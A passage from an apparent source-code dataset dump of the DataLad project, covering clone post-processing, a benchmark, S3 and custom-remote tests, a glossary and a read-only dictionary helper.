test!\n # based on this `rmtree` will happen below after failed clone\n dest_path_existed, stop_props = _test_existing_clone_target(\n destds, candidate_sources)\n if stop_props:\n # something happened that indicates we cannot continue\n # yield and return\n result_props.update(stop_props)\n yield get_status_dict(**result_props)\n return\n\n if reckless is None and cfg:\n # if reckless is not explicitly given, but we operate on a\n # superdataset, query whether it has been instructed to operate\n # in a reckless mode, and inherit it for the coming clone\n reckless = cfg.get('datalad.clone.reckless', None)\n\n last_candidate, error_msgs, stop_props = _try_clone_candidates(\n destds=destds,\n candidate_sources=candidate_sources,\n clone_opts=clone_opts or [],\n dest_path_existed=dest_path_existed,\n )\n if stop_props:\n # no luck, report and stop\n result_props.update(stop_props)\n yield get_status_dict(**result_props)\n return\n else:\n # we can record the last attempt as the candidate URL that gave\n # a successful clone\n result_props['source'] = last_candidate\n\n if not destds.is_installed():\n # we do not have a clone, stop, provide aggregate error message\n # covering all attempts\n yield get_status_dict(\n status='error',\n message=_format_clone_errors(\n destds, error_msgs, last_candidate['giturl']),\n **result_props)\n return\n\n #\n # At minimum all further processing is all candidate for extension\n # patching. wrap the whole thing in try-except, catch any exceptions\n # report it as an error results `rmtree` any intermediate and return\n #\n try:\n yield from _post_gitclone_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=last_candidate,\n reckless=reckless,\n checkout_gitsha=checkout_gitsha,\n description=description,\n )\n except Exception as e:\n ce = CapturedException(e)\n # the rational for turning any exception into an error result is that\n # we are hadly able to distinguish user-error from an other errors\n yield get_status_dict(\n status='error',\n # XXX A test in core insists on the wrong message type to be used\n #error_message=ce.message,\n message=ce.message,\n exception=ce,\n **result_props,\n )\n rmtree(destds.path, children_only=dest_path_existed)\n return\n\n # yield successful clone of the base dataset now, as any possible\n # subdataset clone down below will not alter the Git-state of the\n # parent\n yield get_status_dict(status='ok', **result_props)\n\n\ndef _post_gitclone_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n reckless: None or str,\n checkout_gitsha: None or str,\n description: None or str,\n):\n \"\"\"Perform git-clone post-processing\n\n This is helper is called immediately after a Git clone was established.\n\n The properties of that clone are passed via `gitclonerec`.\n\n Yields\n ------\n DataLad result records\n \"\"\"\n dest_repo = destds.repo\n remote = _get_remote(dest_repo)\n\n yield from _post_git_init_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n\n if knows_annex(destds.path):\n # init annex when traces of a remote annex can be detected\n yield from _pre_annex_init_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n dest_repo = _annex_init(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n description=description,\n )\n yield from _post_annex_init_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n\n if checkout_gitsha and \\\n dest_repo.get_hexsha(\n dest_repo.get_corresponding_branch()) != checkout_gitsha:\n try:\n postclone_checkout_commit(dest_repo, checkout_gitsha,\n remote=remote)\n except Exception:\n # We were supposed to clone a particular version but failed to.\n # This is particularly pointless in case of subdatasets and\n # potentially fatal with current implementation of recursion.\n # see gh-5387\n lgr.debug(\n \"Failed to checkout %s, removing this clone attempt at %s\",\n checkout_gitsha, destds.path)\n raise\n\n yield from _pre_final_processing_(\n destds=destds,\n cfg=cfg,\n gitclonerec=gitclonerec,\n remote=remote,\n reckless=reckless,\n )\n\n\ndef _post_git_init_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Any post-git-init processing that need not be concerned with git-annex\n \"\"\"\n if not gitclonerec.get(\"version\"):\n postclone_check_head(destds, remote=remote)\n\n # act on --reckless=shared-...\n # must happen prior git-annex-init, where we can cheaply alter the repo\n # setup through safe re-init'ing\n if reckless and reckless.startswith('shared-'):\n lgr.debug(\n 'Reinitializing %s to enable shared access permissions',\n destds)\n destds.repo.call_git(['init', '--shared={}'.format(reckless[7:])])\n\n # trick to have the function behave like a generator, even if it\n # (currently) doesn't actually yield anything.\n # but a patched version might want to...so for uniformity with\n # _post_annex_init_processing_() let's do this\n if False:\n yield\n\n\ndef _pre_annex_init_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Pre-processing a to-be-initialized annex repository\"\"\"\n if reckless == 'auto':\n lgr.debug(\n \"Instruct annex to hardlink content in %s from local \"\n \"sources, if possible (reckless)\", destds.path)\n destds.config.set(\n 'annex.hardlink', 'true', scope='local', reload=True)\n\n # trick to have the function behave like a generator, even if it\n # (currently) doesn't actually yield anything.\n if False:\n yield\n\n\ndef _annex_init(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n description: None or str,\n):\n \"\"\"Initializing an annex repository\"\"\"\n lgr.debug(\"Initializing annex repo at %s\", destds.path)\n # Note, that we cannot enforce annex-init via AnnexRepo().\n # If such an instance already exists, its __init__ will not be executed.\n # Therefore do quick test once we have an object and decide whether to call\n # its _init().\n #\n # Additionally, call init if we need to add a description (see #1403),\n # since AnnexRepo.__init__ can only do it with create=True\n repo = AnnexRepo(destds.path, init=True)\n if not repo.is_initialized() or description:\n repo._init(description=description)\n return repo\n\n\ndef _post_annex_init_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Post-processing an annex repository\"\"\"\n # convenience aliases\n repo = destds.repo\n ds = destds\n\n if reckless == 'auto' or (reckless and reckless.startswith('shared-')):\n repo.call_annex(['untrust', 'here'])\n\n _check_autoenable_special_remotes(repo)\n\n # we have just cloned the repo, so it has a remote `remote`, configure any\n # reachable origin of origins\n yield from configure_origins(ds, ds, remote=remote)\n\n\ndef _pre_final_processing_(\n *,\n destds: Dataset,\n cfg: ConfigManager,\n gitclonerec: Dict,\n remote: str,\n reckless: None or str,\n):\n \"\"\"Any post-processing after Git and git-annex pieces are fully initialized\n \"\"\"\n if reckless:\n # store the reckless setting in the dataset to make it\n # known to later clones of subdatasets via get()\n destds.config.set(\n 'datalad.clone.reckless', reckless,\n scope='local',\n reload=True)\n else:\n # We would still want to reload configuration to ensure that any of the\n # above git invocations could have potentially changed the config\n # TODO: might no longer be necessary if 0.14.0 adds reloading upon\n # non-readonly commands invocation\n destds.config.reload()\n\n # trick to have the function behave like a generator, even if it\n # (currently) doesn't actually yield anything.\n if False:\n yield\n\n\ndef postclone_checkout_commit(repo, target_commit, remote=\"origin\"):\n \"\"\"Helper to check out a specific target commit in a fresh clone.\n\n Will not check (again) if current commit and target commit are already\n the same!\n \"\"\"\n # record what branch we were on right after the clone\n active_branch = repo.get_active_branch()\n corr_branch = repo.get_corresponding_branch(branch=active_branch)\n was_adjusted = bool(corr_branch)\n repo_orig_branch = corr_branch or active_branch\n # if we are on a branch this hexsha will be the tip of that branch\n repo_orig_hexsha = repo.get_hexsha(repo_orig_branch)\n # make sure we have the desired commit locally\n # expensive and possibly error-prone fetch conditional on cheap\n # local check\n if not repo.commit_exists(target_commit):\n try:\n repo.fetch(remote=remote, refspec=target_commit)\n except CommandError as e:\n CapturedException(e)\n pass\n # instead of inspecting the fetch results for possible ways\n # with which it could failed to produced the desired result\n # let's verify the presence of the commit directly, we are in\n # expensive-land already anyways\n if not repo.commit_exists(target_commit):\n # there is nothing we can do about this\n # MIH thinks that removing the clone is not needed, as a likely\n # next step will have to be a manual recovery intervention\n # and not another blind attempt\n raise ValueError(\n 'Target commit %s does not exist in the clone, and '\n 'a fetch that commit from remote failed'\n % target_commit[:8])\n # checkout the desired commit\n repo.call_git(['checkout', target_commit])\n # did we detach?\n if repo_orig_branch and not repo.get_active_branch():\n # trace if current state is a predecessor of the branch_hexsha\n lgr.debug(\n \"Detached HEAD after resetting worktree of %s \"\n \"(original branch: %s)\", repo, repo_orig_branch)\n if repo.get_merge_base(\n [repo_orig_hexsha, target_commit]) == target_commit:\n # we assume the target_commit to be from the same branch,\n # because it is an ancestor -- update that original branch\n # to point to the target_commit, and update HEAD to point to\n # that location\n lgr.info(\n \"Reset branch '%s' to %s (from %s) to \"\n \"avoid a detached HEAD\",\n repo_orig_branch, target_commit[:8], repo_orig_hexsha[:8])\n branch_ref = 'refs/heads/%s' % repo_orig_branch\n repo.update_ref(branch_ref, target_commit)\n repo.update_ref('HEAD', branch_ref, symbolic=True)\n if was_adjusted:\n # Note: The --force is needed because the adjust branch already\n # exists.\n repo.adjust(options=[\"--unlock\", \"--force\"])\n else:\n lgr.warning(\n \"%s has a detached HEAD, because the target commit \"\n \"%s has no unique ancestor with branch '%s'\",\n repo, target_commit[:8], repo_orig_branch)\n\n\ndef postclone_check_head(ds, remote=\"origin\"):\n repo = ds.repo\n if not repo.commit_exists(\"HEAD\"):\n # HEAD points to an unborn branch. A likely cause of this is that the\n # remote's main branch is something other than master but HEAD wasn't\n # adjusted accordingly.\n #\n # Let's choose the most recently updated remote ref (according to\n # commit date). In the case of a submodule, switching to a ref with\n # commits prevents .update_submodule() from failing. It is likely that\n # the ref includes the registered commit, but we don't have the\n # information here to know for sure. If it doesn't, .update_submodule()\n # will check out a detached HEAD.\n remote_branches = (\n b[\"refname:strip=2\"] for b in repo.for_each_ref_(\n fields=\"refname:strip=2\", sort=\"-committerdate\",\n pattern=\"refs/remotes/\" + remote))\n for rbranch in remote_branches:\n if rbranch in [remote + \"/git-annex\", \"HEAD\"]:\n continue\n if rbranch.startswith(remote + \"/adjusted/\"):\n # If necessary for this file system, a downstream\n # git-annex-init call will handle moving into an\n # adjusted state.\n continue\n repo.call_git([\"checkout\", \"-b\",\n rbranch[len(remote) + 1:], # drop \"<remote>/\"\n \"--track\", rbranch])\n lgr.debug(\"Checked out local branch from %s\", rbranch)\n return\n lgr.warning(\"Cloned %s but could not find a branch \"\n \"with commits\", ds.path)\n\n\ndef configure_origins(cfgds, probeds, label=None, remote=\"origin\"):\n \"\"\"Configure any discoverable local dataset sibling as a remote\n\n Parameters\n ----------\n cfgds : Dataset\n Dataset to receive the remote configurations\n probeds : Dataset\n Dataset to start looking for `remote` remotes. May be identical with\n `cfgds`.\n label : int, optional\n Each discovered remote will be configured as a remote under the name\n '<remote>-<label>'. If no label is given, '2' will be used by default,\n given that there is typically a remote named `remote` already.\n remote : str, optional\n Name of the default remote on clone.\n \"\"\"\n if label is None:\n label = 1\n # let's look at the URL for that remote and see if it is a local\n # dataset\n origin_url = probeds.config.get(f'remote.{remote}.url')\n if not origin_url:\n # no remote with default name, nothing to do\n return\n if not cfgds.config.obtain(\n 'datalad.install.inherit-local-origin',\n default=True):\n # no inheritance wanted\n return\n if not isinstance(RI(origin_url), PathRI):\n # not local path\n return\n\n # no need to reconfigure original/direct remote again\n if cfgds != probeds:\n # prevent duplicates\n known_remote_urls = set(\n cfgds.config.get(r + '.url', None)\n for r in cfgds.config.sections()\n if r.startswith('remote.')\n )\n if origin_url not in known_remote_urls:\n yield from cfgds.siblings(\n 'configure',\n # no chance for conflict, can only be the second configured\n # remote\n name='{}-{}'.format(remote, label),\n url=origin_url,\n # fetch to get all annex info\n fetch=True,\n result_renderer='disabled',\n on_failure='ignore',\n )\n # and dive deeper\n # given the clone source is a local dataset, we can have a\n # cheap look at it, and configure its own `remote` as a remote\n # (if there is any), and benefit from additional annex availability\n yield from configure_origins(\n cfgds,\n Dataset(probeds.pathobj / origin_url),\n label=label + 1,\n remote=remote)\n" }, { "alpha_fraction": 0.6037896275520325, "alphanum_fraction": 0.6135831475257874, "avg_line_length": 46.92856979370117, "blob_id": "5fb74c2aecafbbc29464589011836cda30753bb0", "content_id": "a7240553d9ffb0e0ffccd2ca6396a10bc1956589", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4697, "license_type": "permissive", "max_line_length": 94, "num_lines": 98, "path": "/benchmarks/usecases.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks for some use cases, typically at datalad.api level\"\"\"\n\nimport sys\nimport tempfile\nfrom datalad.utils import get_tempfile_kwargs\nimport os.path as osp\nfrom os.path import join as opj\n\nfrom datalad.api import create\n\nfrom datalad.utils import (\n create_tree,\n rmtree,\n)\n\nfrom .common import SuprocBenchmarks\n\n\nclass study_forrest(SuprocBenchmarks):\n \"\"\"\n Benchmarks for Study Forrest use cases\n \"\"\"\n\n timeout = 180 # especially with profiling might take longer than default 60s\n\n def setup(self):\n self.path = tempfile.mkdtemp(**get_tempfile_kwargs({}, prefix='bm_forrest'))\n\n def teardown(self):\n if osp.exists(self.path):\n rmtree(self.path)\n\n def time_make_studyforrest_mockup(self):\n path = self.path\n # Carries a copy of the\n # datalad.tests.utils_testdatasets.py:make_studyforrest_mockup\n # as of 0.12.0rc2-76-g6ba6d53b\n # A copy is made so we do not reflect in the benchmark results changes\n # to that helper's code. This copy only tests on 2 not 3 analyses\n # subds\n public = create(opj(path, 'public'), description=\"umbrella dataset\")\n # the following tries to capture the evolution of the project\n phase1 = public.create('phase1',\n description='old-style, no connection to RAW')\n structural = public.create('structural', description='anatomy')\n tnt = public.create('tnt', description='image templates')\n tnt.clone(source=phase1.path, path=opj('src', 'phase1'), reckless=True)\n tnt.clone(source=structural.path, path=opj('src', 'structural'), reckless=True)\n aligned = public.create('aligned', description='aligned image data')\n aligned.clone(source=phase1.path, path=opj('src', 'phase1'), reckless=True)\n aligned.clone(source=tnt.path, path=opj('src', 'tnt'), reckless=True)\n # new acquisition\n labet = create(opj(path, 'private', 'labet'), description=\"raw data ET\")\n phase2_dicoms = create(opj(path, 'private', 'p2dicoms'), description=\"raw data P2MRI\")\n phase2 = public.create('phase2',\n description='new-style, RAW connection')\n phase2.clone(source=labet.path, path=opj('src', 'labet'), reckless=True)\n phase2.clone(source=phase2_dicoms.path, path=opj('src', 'dicoms'), reckless=True)\n # add to derivatives\n tnt.clone(source=phase2.path, path=opj('src', 'phase2'), reckless=True)\n aligned.clone(source=phase2.path, path=opj('src', 'phase2'), reckless=True)\n # never to be published media files\n media = create(opj(path, 'private', 'media'), description=\"raw data ET\")\n # assuming all annotations are in one dataset (in reality this is also\n # a superdatasets with about 10 subdatasets\n annot = public.create('annotations', description='stimulus annotation')\n annot.clone(source=media.path, path=opj('src', 'media'), reckless=True)\n # a few typical analysis datasets\n # (just doing 2, actual status quo is just shy of 10)\n # and also the real goal -> meta analysis\n metaanalysis = public.create('metaanalysis', description=\"analysis of analyses\")\n for i in range(1, 2):\n ana = public.create('analysis{}'.format(i),\n description='analysis{}'.format(i))\n ana.clone(source=annot.path, path=opj('src', 'annot'), reckless=True)\n ana.clone(source=aligned.path, path=opj('src', 'aligned'), reckless=True)\n ana.clone(source=tnt.path, path=opj('src', 'tnt'), reckless=True)\n # link to metaanalysis\n metaanalysis.clone(source=ana.path, path=opj('src', 'ana{}'.format(i)),\n reckless=True)\n # simulate change in an input (but not raw) dataset\n create_tree(\n aligned.path,\n {'modification{}.txt'.format(i): 'unique{}'.format(i)})\n aligned.save('.')\n # finally aggregate data\n aggregate = public.create('aggregate', description='aggregate data')\n aggregate.clone(source=aligned.path, path=opj('src', 'aligned'), reckless=True)\n # the toplevel dataset is intentionally left dirty, to reflect the\n # most likely condition for the joint dataset to be in at any given\n # point in time\n" }, { "alpha_fraction": 0.6148208379745483, "alphanum_fraction": 0.6319218277931213, "avg_line_length": 41.344825744628906, "blob_id": "179d35dc6a6aea9705e9d17059156e4d886fa45e", "content_id": "dbe05ad0541ec4ad2bbaffb6c5ad02d735c9ec4b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4912, "license_type": "permissive", "max_line_length": 120, "num_lines": 116, "path": "/datalad/tests/test_s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test S3 supporting functionality\n\n\"\"\"\n\nfrom datalad.downloaders.tests.utils import get_test_providers\nfrom datalad.support.network import URL\nfrom datalad.support.s3 import (\n add_version_to_url,\n get_versioned_url,\n)\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n eq_,\n ok_startswith,\n skip_if_no_network,\n use_cassette,\n)\n\n\ndef test_add_version_to_url():\n base_url = \"http://ex.com/f.txt\"\n base_url_query = \"http://ex.com/f.txt?k=v\"\n for replace in True, False:\n eq_(add_version_to_url(URL(base_url), \"new.id\", replace=replace),\n base_url + \"?versionId=new.id\")\n\n eq_(add_version_to_url(URL(base_url_query),\n \"new.id\", replace=replace),\n base_url_query + \"&versionId=new.id\")\n\n expected = \"new.id\" if replace else \"orig.id\"\n eq_(add_version_to_url(URL(base_url + \"?versionId=orig.id\"),\n \"new.id\",\n replace=replace),\n base_url + \"?versionId=\" + expected)\n\n eq_(add_version_to_url(URL(base_url_query + \"&versionId=orig.id\"),\n \"new.id\",\n replace=replace),\n base_url_query + \"&versionId=\" + expected)\n\n\n@skip_if_no_network\n@use_cassette('s3_test_version_url')\ndef test_get_versioned_url():\n get_test_providers('s3://openfmri/tarballs') # to verify having credentials to access openfmri via S3\n for url_pref in ('http://openfmri.s3.amazonaws.com', 'https://s3.amazonaws.com/openfmri'):\n eq_(get_versioned_url(url_pref + \"/tarballs/ds001_raw.tgz\"),\n url_pref + \"/tarballs/ds001_raw.tgz?versionId=null\")\n\n eq_(get_versioned_url(url_pref + \"/tarballs/ds001_raw.tgz?param=1\"),\n url_pref + \"/tarballs/ds001_raw.tgz?param=1&versionId=null\")\n\n # We don't duplicate the version if it already exists.\n eq_(get_versioned_url(url_pref + \"/tarballs/ds001_raw.tgz?versionId=null\"),\n url_pref + \"/tarballs/ds001_raw.tgz?versionId=null\")\n\n # something is wrong there\n #print(get_versioned_url(\"http://openfmri.s3.amazonaws.com/ds001/demographics.txt\"))\n\n eq_(get_versioned_url(\"someurl\"), \"someurl\") # should just return original one\n assert_raises(RuntimeError, get_versioned_url, \"someurl\", guarantee_versioned=True)\n\n # TODO: on a bucket without versioning\n url = \"http://datalad-test0-nonversioned.s3.amazonaws.com/2versions-removed-recreated.txt\"\n eq_(get_versioned_url(url), url)\n eq_(get_versioned_url(url, return_all=True), [url])\n\n assert_raises(NotImplementedError, get_versioned_url, \"s3://buga\")\n\n urls = get_versioned_url(\"http://datalad-test0-versioned.s3.amazonaws.com/2versions-removed-recreated.txt\",\n return_all=True, verify=True)\n eq_(len(set(urls)), len(urls)) # all unique\n for url in urls:\n # so we didn't grab other files along with the same prefix\n ok_startswith(url, 'http://datalad-test0-versioned.s3.amazonaws.com/2versions-removed-recreated.txt?versionId=')\n\n # Update a versioned URL with a newer version tag.\n url_3ver = \"http://datalad-test0-versioned.s3.amazonaws.com/3versions-allversioned.txt\"\n url_3ver_input = url_3ver + \"?versionId=b.qCuh7Sg58VIYj8TVHzbRS97EvejzEl\"\n eq_(get_versioned_url(url_3ver_input), url_3ver_input)\n eq_(get_versioned_url(url_3ver_input, update=True),\n url_3ver + \"?versionId=Kvuind11HZh._dCPaDAb0OY9dRrQoTMn\")\n\n\n@skip_if_no_network\n@use_cassette('s3_test_version_url_anon')\ndef test_get_versioned_url_anon():\n # The one without any authenticator, was crashing.\n # Also it triggered another bug about having . in the bucket name\n url_on = \"http://dandiarchive.s3.amazonaws.com/ros3test.nwb\"\n url_on_versioned = get_versioned_url(url_on)\n ok_startswith(url_on_versioned, url_on + \"?versionId=\")\n\n\n@skip_if_no_network\n@use_cassette('s3_test_version_url_deleted')\ndef test_version_url_deleted():\n get_test_providers('s3://datalad-test0-versioned/', reload=True) # to verify having credentials to access\n # openfmri via S3\n # it existed and then was removed\n fpath = \"1version-removed.txt\"\n url = \"http://datalad-test0-versioned.s3.amazonaws.com/%s\" % fpath\n turl = \"http://datalad-test0-versioned.s3.amazonaws.com/%s\" \\\n \"?versionId=eZ5Hgwo8azfBv3QT7aW9dmm2sbLUY.QP\" % fpath\n eq_(get_versioned_url(url), turl)\n # too heavy for verification!\n #eq_(get_versioned_url(url, verify=True), turl)\n" }, { "alpha_fraction": 0.6749491095542908, "alphanum_fraction": 0.6806517243385315, "avg_line_length": 38.6129035949707, "blob_id": "08863e6154dd8d2fe029e53646a96305739ef1ff", "content_id": "fa65fa11b1a2d4ee1adc0f27f6be694108e1a004", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2457, "license_type": "permissive", "max_line_length": 120, "num_lines": 62, "path": "/docs/source/glossary.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst; fill-column: 78; indent-tabs-mode: nil -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n #\n # See COPYING file distributed along with the datalad package for the\n # copyright and license terms.\n #\n ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n\n.. _chap_glossary:\n\n********\nGlossary\n********\n\nDataLad purposefully uses a terminology that is different from the one used by\nits technological foundations Git_ and git-annex_. This glossary provides\ndefinitions for terms used in the datalad documentation and API, and relates\nthem to the corresponding Git_/git-annex_ concepts.\n\n.. glossary::\n :sorted:\n\n dataset\n A regular Git_ repository with an (optional) :term:`annex`.\n\n subdataset\n A :term:`dataset` that is part of another dataset, by means of being\n tracked as a Git_ submodule. As such, a subdataset is also a complete\n dataset and not different from a standalone dataset.\n\n superdataset\n A :term:`dataset` that contains at least one :term:`subdataset`.\n\n sibling\n A :term:`dataset` (location) that is related to a particular dataset,\n by sharing content and history. In Git_ terminology, this is a *clone*\n of a dataset that is configured as a *remote*.\n\n annex\n Extension to a Git_ repository, provided and managed by git-annex_ as\n means to track and distribute large (and small) files without having to\n inject them directly into a Git_ repository (which would slow Git\n operations significantly and impair handling of such repositories in\n general).\n\n CLI\n A `Command Line Interface`_. Could be used interactively by executing\n commands in a `shell`_, or as a programmable API for shell scripts.\n\n DataLad extension\n A Python package, developed outside of the core DataLad codebase, which\n (when installed) typically either provides additional top level `datalad`\n commands and/or additional metadata extractors. Visit\n `Handbook, Ch.2. DataLad’s extensions <http://handbook.datalad.org/en/latest/basics/101-144-intro_extensions.html>`_\n for a representative list of extensions and instructions on how to install\n them.\n\n.. _Git: https://git-scm.com\n.. _Git-annex: http://git-annex.branchable.com\n.. _`Command Line Interface`: https://en.wikipedia.org/wiki/Command-line_interface\n.. _shell: https://en.wikipedia.org/wiki/Shell_(computing)" }, { "alpha_fraction": 0.560628354549408, "alphanum_fraction": 0.5650466084480286, "avg_line_length": 29.402984619140625, "blob_id": "0624d264d6920b72e33210e2ab70b9b1276235b5", "content_id": "5269a2653722ec81ecc1b3df2c28536f6aa8b041", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2037, "license_type": "permissive", "max_line_length": 87, "num_lines": 67, "path": "/datalad/support/collections.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Auxiliary data structures\"\"\"\n\nfrom typing import Mapping\n\n\nclass ReadOnlyDict(Mapping):\n # Taken from https://github.com/slezica/python-frozendict\n # License: MIT\n \"\"\"\n An immutable wrapper around dictionaries that implements the complete\n :py:class:`collections.Mapping` interface. It can be used as a drop-in\n replacement for dictionaries where immutability is desired.\n \"\"\"\n dict_cls = dict\n\n def __init__(self, *args, **kwargs):\n self._dict = self.dict_cls(*args, **kwargs)\n self._hash = None\n\n def __getitem__(self, key):\n return self._dict[key]\n\n def __contains__(self, key):\n return key in self._dict\n\n def copy(self, **add_or_replace):\n return self.__class__(self, **add_or_replace)\n\n def __iter__(self):\n return iter(self._dict)\n\n def __len__(self):\n return len(self._dict)\n\n def __repr__(self):\n return '<%s %r>' % (self.__class__.__name__, self._dict)\n\n def __hash__(self):\n if self._hash is None:\n h = 0\n for key, value in self._dict.items():\n h ^= hash((key, _val2hashable(value)))\n self._hash = h\n return self._hash\n\n\ndef _val2hashable(val):\n \"\"\"Small helper to convert incoming mutables to something hashable\n\n The goal is to be able to put the return value into a set, while\n avoiding conversions that would result in a change of representation\n in a subsequent JSON string.\n \"\"\"\n if isinstance(val, dict):\n return ReadOnlyDict(val)\n elif isinstance(val, list):\n return tuple(map(_val2hashable, val))\n else:\n return val\n" }, { "alpha_fraction": 0.6517778635025024, "alphanum_fraction": 0.6691154837608337, "avg_line_length": 36.39560317993164, "blob_id": "3c2af6ebe7cb9952e6143b3c2127926e71c88723", "content_id": "fac347aec834528e22453f13ccc0a7f07b5e3cc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3403, "license_type": "permissive", "max_line_length": 89, "num_lines": 91, "path": "/datalad/customremotes/tests/test_datalad.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the universal datalad's annex customremote\"\"\"\n\nimport glob\nimport logging\nimport os.path as op\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.downloaders.tests.utils import get_test_providers\nfrom datalad.support.exceptions import CommandError\nfrom datalad.support.external_versions import external_versions\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n eq_,\n serve_path_via_http,\n skip_if_no_network,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\n\n\n@with_tempfile()\n@skip_if_no_network\ndef check_basic_scenario(url, d=None):\n ds = Dataset(d).create()\n annex = ds.repo\n\n # TODO skip if no boto or no credentials\n get_test_providers(url) # so to skip if unknown creds\n\n # Let's try to add some file which we should have access to\n ds.download_url(url)\n ds.save()\n\n # git-annex got a fix where it stopped replacing - in the middle of the filename\n # Let's cater to the developers who might have some intermediate version and not\n # easy to compare -- we will just check that only one file there is an that it\n # matches what we expect when outside of the development versions range:\n filenames = glob.glob(op.join(d, '3versions[-_]allversioned.txt'))\n eq_(len(filenames), 1)\n filename = op.basename(filenames[0])\n # Date after the fix in 8.20200501-53-gcabbc91b1 - must have '-'\n if external_versions['cmd:annex'] >= '8.20200512':\n assert_in('-', filename)\n else:\n # either one is ok\n assert '_' in filename or '-' in filename\n\n whereis1 = annex.whereis(filename, output='full')\n eq_(len(whereis1), 2) # here and datalad\n annex.drop(filename)\n\n whereis2 = annex.whereis(filename, output='full')\n eq_(len(whereis2), 1) # datalad\n\n # make sure that there are no \"hidden\" error messages, despite the\n # whereis command succeeding\n # https://github.com/datalad/datalad/issues/6453#issuecomment-1047533276\n from datalad.runner import StdOutErrCapture\n\n # we need to swallow logs since if DATALAD_LOG_LEVEL is set low, we\n # would get all the git-annex debug output in stderr\n with swallow_logs(new_level=logging.INFO) as cml:\n out = annex._call_annex(['whereis'], protocol=StdOutErrCapture)\n eq_(out['stderr'].strip(), '')\n\n # if we provide some bogus address which we can't access, we shouldn't pollute output\n with assert_raises(CommandError) as cme:\n annex.add_url_to_file('bogus', url + '_bogus')\n assert_in('addurl: 1 failed', cme.value.stderr)\n\n\n# unfortunately with_tree etc decorators aren't generators friendly thus\n# this little adapters to test both on local and s3 urls\n@with_tree(tree={'3versions-allversioned.txt': \"somefile\"})\n@serve_path_via_http\ndef test_basic_scenario_local_url(p=None, local_url=None):\n check_basic_scenario(\"%s3versions-allversioned.txt\" % local_url)\n\n\ndef test_basic_scenario_s3():\n check_basic_scenario('s3://datalad-test0-versioned/3versions-allversioned.txt')\n" }, { "alpha_fraction": 0.5934369564056396, "alphanum_fraction": 0.5968911647796631, "avg_line_length": 36.11538314819336, "blob_id": "bce82af43468c9d841318d7f476af657e7d43c4c", "content_id": "7d1dd36754d72fcc96423ef10bd550e007545e1d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2895, "license_type": "permissive", "max_line_length": 99, "num_lines": 78, "path": "/datalad/api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### 